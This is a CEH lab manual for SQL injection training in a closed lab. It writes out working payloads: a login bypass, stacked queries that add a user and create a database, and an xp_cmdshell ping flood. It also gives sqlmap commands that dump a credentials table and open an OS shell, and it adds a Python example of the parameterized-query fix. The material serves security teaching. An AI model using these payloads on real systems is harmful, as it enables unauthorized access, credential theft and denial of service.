CEHv10 Module 15 SQL Injection

SQL Injection
CEH Lab Manual - Module 15: SQL Injection
Ethical Hacking and Countermeasures. Copyright © by EC-Council. All Rights Reserved.

SQL Injection

SQL injection is a technique often used to attack a website, and it is also the most common web vulnerability on the Internet.

Lab Scenario

The SQL injection attack is performed by including portions of SQL statements in web form entry fields in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in a website's software. This vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or user input is not strongly typed and is unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump database information, like credit card numbers or passwords, to the attacker. SQL injection is mostly known as an attack vector for websites, but it can be used to attack any type of SQL database.

As an Expert Ethical Hacker, you must use diverse solutions: prepared statements with bind variables, whitelisting input validation, and escaping. Input validation can be used to detect unauthorized input before it is passed to the SQL query.

Lab Objectives

The objective of this lab is to provide expert knowledge on SQL injection attacks and other responsibilities that include:
+ Understanding when and how a web application connects to a database server in order to access data
+ Extracting basic SQL injection flaws and vulnerabilities
+ Testing web applications for Blind SQL injection vulnerabilities
+ Scanning web servers and analyzing the reports
+ Securing information in web applications and web servers

Lab Environment

To complete this lab, you will need:
+ A computer running Windows Server 2016
+ Windows Server 2012 running on a virtual machine
+ Windows 10 running on a virtual machine
+ Windows 8 running on a virtual machine
+ A web browser with an Internet connection
+ Administrative privileges to configure settings and run the tools

Lab Duration

Time: 50 Minutes

Overview of SQL Injection

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database.

Lab Tasks Overview

Recommended labs to assist you in SQL injection are:
+ SQL Injection Attacks on MSSQL Database
+ Performing SQL Injection Attack against MSSQL to Extract Databases and WebShell using SQLMAP
+ Testing for SQL Injection using IBM Security AppScan Tool
+ Scanning Web Applications using N-Stalker

Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Lab 1: SQL Injection Attacks on MSSQL Database

SQL injection is a basic attack used either to gain unauthorized access to a database or to retrieve information directly from it.

Lab Scenario

Today, SQL injection is one of the most common and perilous attacks that website software experiences. This attack is performed on SQL databases behind weakly written code, and the vulnerability can be used by an attacker to execute database queries to collect sensitive information, modify database entries, or attach malicious code, resulting in total compromise of the most sensitive data.

As an Expert Penetration Tester and Security Administrator, you need to test web applications running on the MS SQL Server database for vulnerabilities and flaws.

Lab Objectives

The objective of this lab is to provide students with expert knowledge on SQL injection attacks and to analyze web applications for vulnerabilities. In this lab, you will learn how to:
+ Log on without valid credentials
+ Test for SQL injection
+ Create your own user account
+ Create your own database
+ Directory listing
+ Enforce Denial of Service attacks

Lab Environment

To complete this lab, you will need:
+ A computer running Windows Server 2016 (Victim Machine)
+ A computer running Windows Server 2012 (Attacker Machine)
+ The MS SQL Server must be running under local system privileges
+ A web browser with an Internet connection

Lab Duration

Time: 15 Minutes

Overview of SQL Injection Attacks

SQL injection is a basic attack used either to gain unauthorized access to a database or to retrieve information directly from the database. It is a flaw in web applications and not a database or web server issue. Most programmers are still not aware of this threat.

Lab Tasks

Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. Blind SQL injection is identical to normal SQL injection, except that, when an attacker attempts to exploit an application, rather than seeing a useful error message, a generic custom page is displayed.

In this lab, the machine hosting the website is the victim machine (i.e., Windows Server 2016), and the machine used to perform the SQL injection attack is the Windows Server 2012 machine.

Task 1: Log on without valid credentials

1. Before starting this lab, make sure that you have logged into Windows Server 2016 and Windows Server 2012.
2. In the Windows Server 2012 machine, launch a web browser, type http://www.goodshopping.com in the address bar, and press Enter. In this lab we are using the Chrome web browser; if you are using any other browser, the screenshots will vary in your lab environment.
3. The GoodShopping home page appears as shown in the screenshot.
4. Assume that you are new to this site and have never registered with it. Now click LOGIN.
5. Type the query blah' or 1=1-- in the Username field (as your login name), and leave the Password field empty.
6. Click Log in.
7. You are logged into the website with a fake login, though your credentials are not valid. Now you can browse all the site's pages as a registered member.
8. After browsing the site, click Logout.
9. You have successfully logged out of the vulnerable site; now close the web browser.
10. Before performing the next task (i.e., creating a user account with the SQL injection query), first let us confirm with the Login table of the GoodShopping database.
11. Switch to the Windows Server 2016 machine, navigate to Start > Microsoft SQL Server Tools 17, and click Microsoft SQL Server Management Studio 17.
12. The Microsoft SQL Server Management Studio window appears with the Connect to Server pop-up; choose Windows Authentication in the Authentication field and click Connect.
13. The Microsoft SQL Server Management Studio window appears as shown in the screenshot. In the left pane of Object Explorer, expand Databases > GoodShopping > Tables. Under Tables, right-click dbo.Login and click Select Top 1000 Rows from the context menu to view the available entries.
14. As you can see, the table has only one entry: smith and smith123.

Task 2: Create Your Own User Account

15. Switch back to the Windows Server 2012 machine, launch a browser, type http://www.goodshopping.com in the address bar, and press Enter. The GOOD SHOPPING home page appears, as shown in the screenshot.
16. Click LOGIN, type the query blah';insert into login values ('john','apple123');-- in the Username field (as your login name), and leave the Password field empty, as shown in the screenshot.
17. Click Log in.
18. If no error message is displayed, it means that you have successfully created your login using an SQL injection query.
19. After executing the query, to verify whether your login has been created successfully, click the LOGIN tab, enter john in the Username field and apple123 in the Password field, and click Log in.
20. You will log in successfully with the created login. Now you can access all the features of the website.
21. Click Logout after browsing the desired pages, and close the browser window.
22. Switch back to the Windows Server 2016 virtual machine.
23. Right-click dbo.Login, and click Select Top 1000 Rows from the context menu.
24. Observe that the username and password have been successfully added to the GoodShopping database.
25. Note down the available databases and then close SQL Server Management Studio.

Task 3: Create Your Own Database

27. Launch the browser, type http://www.goodshopping.com in the address bar, and press Enter.
28. The home page of GOOD SHOPPING appears.
29. Click LOGIN, type blah';create database mydatabase;-- in the Username field, leave the Password field empty, and click Log in.
30. In the above query, mydatabase is the name of the database.
31. If no error message (or any message) is displayed on the web page, it means that the site is vulnerable to SQL injection: a database with the name mydatabase has been created on the database server. Close the browser.
32. Switch back to the Windows Server 2016 victim machine, launch SQL Server Management Studio, and log in.
33. The Microsoft SQL Server Management Studio main window appears as shown in the screenshot.
34. Expand the Databases node. A new database has been created with the name mydatabase, as shown in the screenshot.

Task 4: Denial of Service

37. Launch the web browser, type http://www.goodshopping.com in the address bar, and press Enter.
38. The GOOD SHOPPING home page appears.
39. Click LOGIN, type blah';exec master..xp_cmdshell 'ping www.certifiedhacker.com -l 65000 -t';-- in the Username field, leave the Password field empty, and click Log in.
40. In the above query, you are performing a ping of the www.certifiedhacker.com website using an SQL injection query; -l is the send buffer size, and -t pings the specified host until stopped.
41. The SQL injection query starts pinging the host, and the login page shows a "Waiting for www.goodshopping.com..." message at the bottom of the browser window.
42. To see whether the query has executed successfully, switch back to Windows Server 2016.
43. Launch Task Manager.
44. In Task Manager, under the Details tab, you see a process called PING.EXE running in the background.
45. This process is the result of the SQL injection query that you entered in the login field of the website.
46. To manually kill this process, right-click PING.EXE and click End Process. This stops the website from pinging the host.

Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Lab 2: Performing SQL Injection Attack against MSSQL to Extract Databases and WebShell using SQLMAP

SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

Tools demonstrated in this lab are available at Z:\CEH-Tools\CEHv10 Module 15 SQL Injection.

Lab Scenario

SQL injection is a technique used to take advantage of unsanitized input vulnerabilities to pass SQL commands through a web application for execution by a backend database. SQL injection is a basic attack used either to gain unauthorized access to a database or to retrieve information directly from the database. It is a flaw in web applications and not a database or web server issue.

Lab Objectives

The objective of this lab is to help students learn how to perform an SQL injection attack and extract databases.

Lab Environment

To complete this lab, you will need:
+ Windows Server 2016 (Victim Machine)
+ Kali Linux machine (Attacker Machine)
+ Run this lab on the Kali Linux machine
+ Make sure that the Windows Server 2016 machine is running
+ A web browser with Internet access
+ Microsoft .NET Framework Version 4.0 or later

Lab Duration

Time: 10 Minutes

Overview of Testing Web Applications

Web applications are tested for implementing security and automating vulnerability assessments. Doing so prevents SQL injection attacks on web servers and web applications. Websites are tested for embedded malware and by employing multiple testing techniques.

Lab Tasks

1. Log in to the Kali Linux machine with Username: root and Password: toor.
2. Before starting this lab, assume that you are a registered user on the http://www.moviescope.com website and you want to crack the passwords of the other users from the moviescope database.
3. Open a web browser and log in to http://www.moviescope.com with Username: sam and the password given for that account [illegible in this copy].
4. Once you are logged into the website, click the View Profile tab and make a note of the URL in the address bar of the browser.
5. Right-click anywhere on the web page and click Inspect Element (Q) from the context menu as shown in the screenshot.
6. The Developer Tools section appears as shown in the screenshot; click the Console tab, type document.cookie in the lower left corner of the browser, and press Enter.
7. Select the cookie value, right-click it, and copy the value as shown in the screenshot. Minimize the web browser. Note: the cookie value may differ in your lab environment.
8. Click the Terminal icon on the taskbar to launch it, as shown in the screenshot.
9. Type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied in step #7>" --dbs and press Enter.
10. By issuing the above command, sqlmap applies various injection techniques to the id parameter of the URL in an attempt to extract the database information of the moviescope website.
11. sqlmap retrieves the databases present in MS SQL Server. It also displays information about the web server operating system, web application technology, and the back-end DBMS, as shown in the screenshot.
12. Now, you need to choose a database and use sqlmap to retrieve the tables in the database. In this lab, we are going to determine the tables associated with the moviescope database. Type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied in step #7>" -D moviescope --tables and press Enter. By issuing the above command, sqlmap starts scanning the moviescope database in search of the tables located in it.
13. sqlmap retrieves the tables of the moviescope database and displays them.
14. Now, you need to retrieve the columns associated with the tables. In this lab, you will use sqlmap to retrieve the columns of the table named User_Login. For extracting column information, issue the following sqlmap command: sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied in step #7>" -D moviescope -T User_Login --columns. By issuing the above command, sqlmap starts scanning the User_Login table inside the moviescope database in search of columns.
15. sqlmap retrieves the available columns in the above-mentioned table, i.e., User_Login, as shown in the screenshot.
16. Now type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied in step #7>" -D moviescope -T User_Login --dump and press Enter to dump all the User_Login table content.
17. sqlmap has now retrieved the complete contents of the moviescope table, which contain the usernames and passwords of the users, as shown in the screenshot.
18. To verify that the login details are valid, you can log in with the extracted login details of any of the users. Before that, close the Developer Tools console and log out from the previous session in the browser, then log in. In this lab we are logging in with the user steve and that user's extracted password.
19. As you see in the screenshot below, we have successfully logged into the moviescope website with steve's account.
20. Now type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied in step #7>" --os-shell and press Enter.
21. When the message asking whether sqlmap should try to optimize value(s) for DBMS delay responses appears, type Y and press Enter to continue.
22. Once sqlmap acquires permission to optimize the machine, it will give you the shell. Type hostname and press Enter to find the name of the machine where the site is running.
23. When the "Do you want to retrieve the command standard output?" message appears, type Y and press Enter.
24. sqlmap thus retrieves the hostname, as shown in the screenshot. Note: whenever the "Do you want to retrieve the command standard output?" message appears, type Y and press Enter.
25. Type ipconfig and press Enter to see the IP configuration of the machine.
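As an added example (not code from the CEH lab manual or from the GoodShopping and Moviescope sites it targets), the following Python mirrors the string-concatenated login query that Lab 1's blah' or 1=1-- step abuses, beside the bind-variable, whitelist and strong-typing fixes the module introduction recommends; it also covers the id parameter sqlmap manipulates in Lab 2. The table name, sample row and function names are assumptions, and an in-memory SQLite table stands in for the MS SQL dbo.Login table so it runs offline.

```python
"""Added illustration, not the lab's or the target sites' own code: the
concatenated login query behind Lab 1 and the fixes the module introduction
recommends (bind variables, whitelist validation, strong typing)."""
import re
import sqlite3


def make_db():
    # Constructed stand-in for the lab's dbo.Login table: one row, smith/smith123.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Login (username TEXT, password TEXT)")
    con.execute("INSERT INTO Login VALUES ('smith', 'smith123')")
    return con


def vulnerable_login(con, username, password):
    """The pattern Lab 1 exploits: form fields pasted straight into SQL text.

    With username  blah' or 1=1--  the WHERE clause becomes
        username = 'blah' or 1=1--' AND password = ''
    so the password check is commented out and every row matches.
    """
    sql = ("SELECT COUNT(*) FROM Login WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return con.execute(sql).fetchone()[0] > 0


def safe_login(con, username, password):
    """Bind variables: the SQL text is fixed and the driver passes the values
    separately, so quotes and '--' in the input remain plain data."""
    row = con.execute(
        "SELECT COUNT(*) FROM Login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0


# Whitelist for the Username field: letters, digits, dot, underscore, dash.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")


def username_allowed(username):
    """Reject anything outside the whitelist before it reaches any query."""
    return USERNAME_RE.fullmatch(username) is not None


def parse_profile_id(raw):
    """Strong typing for Lab 2's viewprofile.aspx?id= parameter: accept only a
    plain ASCII positive integer, so suffixes such as '1 AND 1=1' or '1;--'
    never become part of a query. Returns None when the value is rejected."""
    if raw.isascii() and raw.isdigit() and 0 < len(raw) <= 9:
        return int(raw)
    return None


if __name__ == "__main__":
    db = make_db()
    payload = "blah' or 1=1--"
    print("concatenated query accepts payload:", vulnerable_login(db, payload, ""))
    print("parameterized query accepts payload:", safe_login(db, payload, ""))
    print("parameterized query, real user:", safe_login(db, "smith", "smith123"))
    print("whitelist passes payload:", username_allowed(payload))
    print("profile id '1 AND 1=1' ->", parse_profile_id("1 AND 1=1"))
```

Stacked statements such as the insert and create database payloads of Tasks 2 and 3 are stopped by the same parameterization, and running the database service under a low-privilege account rather than local system (the lab's stated precondition) is what keeps xp_cmdshell out of reach even if an injection slips through.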
Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Platform Supported: Classroom, iLabs

Lab 3: Testing for SQL Injection using IBM Security AppScan Tool

IBM Security AppScan is a web application security testing tool that automates vulnerability assessments, helps prevent SQL injection attacks on websites, and scans websites for embedded malware.

Lab Scenario

By now, you must be familiar with the types of SQL injection attacks an attacker can perform and the impact caused by these attacks. Attackers can use the following types of SQL injection attacks: Authentication Bypass, Information Disclosure, Compromised Data Integrity, Compromised Availability of Data, and Remote Code Execution, which allow them to spoof identity, damage existing data, execute system-level commands to cause a denial of service of the application, and so on. In the previous lab, you have already learned to test SQL injection attacks on an MS SQL database for website vulnerabilities.

As an organization's Expert Security Professional and Penetration Tester, your job responsibility is to test the company's web applications and web services for vulnerabilities. You need to find various ways to extend security tests, analyze web applications, and employ multiple testing techniques. Moving further, in this lab, you will learn to test for SQL injection attacks using IBM Security AppScan.

Lab Objectives

The objective of this lab is to help students learn how to test web applications for SQL injection threats and vulnerabilities. In this lab, you will learn to:
+ Perform website scans for vulnerabilities
+ Analyze scanned results
+ Generate reports for scanned web applications
+ Install and configure IBM Security AppScan

Lab Environment

To complete this lab, you will need:
+ IBM Security AppScan, located at Z:\CEH-Tools\CEHv10 Module 15 SQL Injection\SQL Injection Detection Tools\IBM Security AppScan
+ A computer running Windows Server 2016
+ You can also download the latest version of Security AppScan from http://www-04.ibm.com/software/awdtools/appscan/standard
+ A web browser with Internet access
+ Microsoft .NET Framework Version 4.0 or later

Lab Duration

Time: 15 Minutes

Overview of Testing Web Applications

Web applications are tested for implementing security and automating vulnerability assessments. Doing so prevents SQL injection attacks on web servers and web applications. Websites are tested for embedded malware and by employing multiple testing techniques.

Lab Tasks

1. Navigate to Z:\CEH-Tools\CEHv10 Module 15 SQL Injection\SQL Injection Detection Tools\IBM Security AppScan and double-click the AppScan Standard evaluation installer (AppScan_Std_..._Eval_Win.exe).
2. If an Open File - Security Warning pop-up appears, click Run.
3. Follow the wizard-driven installation steps and install the IBM Security AppScan tool.
4. It takes around 5 minutes to complete the installation process. Note: during installation, a Web Services Component Download dialog box appears asking you to download an additional component. Click No to avoid the download.
5. Launch the IBM Security AppScan application from the Apps list of Windows Server 2016.
6. The main window of IBM Security AppScan appears; click Create New Scan... to begin scanning.
7. A New Scan pop-up appears; click the demo.testfire.net link. Note: in the evaluation version we cannot scan other websites.
8. The Scan Configuration Wizard appears; select AppScan (automatically or manually) and click Next.
9. Under URL and Servers, leave the default options and click Next.
10. Under Login Management, select Automatic, enter the username jsmith and password Demo1234, and click Next.
11. Under Test Policy, leave the default options and click Next.
12. Under Complete, verify that Start a full automatic scan is selected, and click Finish to complete the scan configuration.
13. An Auto Save dialog box prompts you to save automatically during the scan; click Yes to save the file and proceed.
14. The Save As window appears; navigate to the location where you would like to save the scan, specify a name for it, and click Save.
15. IBM Security AppScan starts scanning the provided URL.
16. The Scan Expert Recommendations pane opens; click Ignore All in the pane.
17. An AppScan pop-up appears; click Yes.
18. AppScan begins to scan for website vulnerabilities. Note: it will take a lot of time to scan the complete site.
19. After the scan completes, the application lists all the security issues and vulnerabilities it has found.
20. Results can be displayed in three views: Data, Issues, and Tasks.
21. To view the vulnerabilities and security issues found, click Issues.
22. To analyze the scan results, click any of the items, such as SQL Injection, and expand the nodes to see all the links that are vulnerable to SQL injection.
23. You can find an explanation of the selected link in the right pane of the GUI, under Issue Information.
24. Click the Advisory tab in the right pane of the window to see the severity of that particular link, as well as the description of the threat.
25. Click Fix Recommendation to get advice for fixing these vulnerabilities.
26. After AppScan assesses your site's vulnerabilities, you can generate customized reports for the issues in your application.
27. You can open and view the reports from within Security AppScan, and you can save a report in any other format that can be opened with the appropriate application.
28. To generate a report, click Tools > Create Report. The Create Report window appears.
29. Select the type of report to generate, check the options, and click Save Report.
31. The saved report will be helpful for future reference.

Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Platform Supported: Classroom, iLabs

Lab 4: Scanning Web Applications using N-Stalker Tool

N-Stalker 2012 is a sophisticated web security assessment solution for your web application. By incorporating its well-known "N-Stealth HTTP Security Scanner" and its 39,000-item Web Attack Signature database, along with its patent-pending component-oriented security assessment technology, N-Stalker is a "first rate" security tool for developers, system/security administrators, IT auditors, and others.

Lab Scenario

Some attackers perform SQL injection attacks based on the "error messages" received from servers. If an error is returned by the application, the attacker can determine the database's entire structure and read any value that can be read by the account the ASP application is using to connect to the SQL server. However, if an error message is returned from the database server stating only that the SQL query's syntax is incorrect, an attacker tries all possible true/false questions via SQL statements to steal data.

As an Expert Security Professional and Penetration Tester, you should be familiar with the tips and tricks used in SQL injection detection. You must also be aware of all the tools that can be used to detect SQL injection flaws. In this lab, you will learn to do so using N-Stalker.

Lab Objectives

The objective of this lab is to help students learn how to test web applications for SQL injection threats and vulnerabilities. In this lab, you will learn to:
+ Perform website scans for vulnerabilities
+ Analyze scanned results
+ Save scan results
+ Install N-Stalker

Lab Environment

To complete this lab, you will need:
+ N-Stalker, located at Z:\CEH-Tools\CEHv10 Module 15 SQL Injection\SQL Injection Detection Tools\N-Stalker Web Application Security Scanner
+ Run this tool in Windows Server 2016
+ You can also download the latest version of N-Stalker from http://www.nstalker.com/products/editions/free/download/
+ If you download the latest version of the tool, the screenshots will vary
+ A web browser with Internet access
+ Microsoft .NET Framework Version 4.0 or later

Lab Duration

Time: 10 Minutes

Overview of Testing Web Applications

Web applications are tested for implementing security and automating vulnerability assessments. Doing so prevents SQL injection attacks on web servers and web applications. Websites are tested for embedded malware and by employing multiple testing techniques.

Lab Tasks

1. Navigate to Z:\CEH-Tools\CEHv10 Module 15 SQL Injection\SQL Injection Detection Tools\N-Stalker Web Application Security Scanner, double-click the NStalker-WebSecurityScanner-Free installer, and follow the steps to install the application.
2. Once the installation is completed, ensure that the Run N-Stalker Web Application Security Scanner option is checked, uncheck Show Readme, and then click Finish. The N-Stalker application launches automatically.
3. Alternatively, you can also launch the application from Start > N-Stalker Web Application Security and click N-Stalker Free X, or double-click the N-Stalker Free X shortcut icon on the Desktop.
4. The N-Stalker GUI appears; click Update to update the application.
5. The N-Stalker Free Edition pop-up appears; click OK to continue.
6. N-Stalker will start updating the database, which takes some time.
7. After updating is complete, click Start to start a new scanning session.
8. In the N-Stalker Scan Wizard, enter http://www.goodshopping.com.
9. Choose the Scan Policy OWASP Policy, and click Next.
10. Under Optimize Settings, leave the default options, and click Next.
11. Click Yes in the Settings Not Optimized pop-up.
12. [step illegible in this copy]
13. The N-Stalker Free Edition pop-up appears; click OK to continue.
14. After completing the configuration of N-Stalker, click Start Scan to begin the scan.
15. N-Stalker begins to scan the website as shown in the screenshot.
16. It takes some time for the application to scan the entire website.
17. N-Stalker scans the site in four different steps: Spider, Info Gather, Run Modules, and Sig Scanner.
18. On completion of the scan, the Results Wizard appears.
19. Select Save scan results (under Session Management Options) and Keep scan session for further analysis (under Next Steps), and click Next.
20. N-Stalker displays a summary of the vulnerabilities found. After examining the summary, click Done.
22. You can view the complete scan results in N-Stalker's main dashboard.
23. You can also expand the URL http://www.goodshopping.com (under Vulnerabilities) to view all the site's vulnerabilities.
24. On completion of this lab, close the N-Stalker GUI.

Lab Analysis

Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
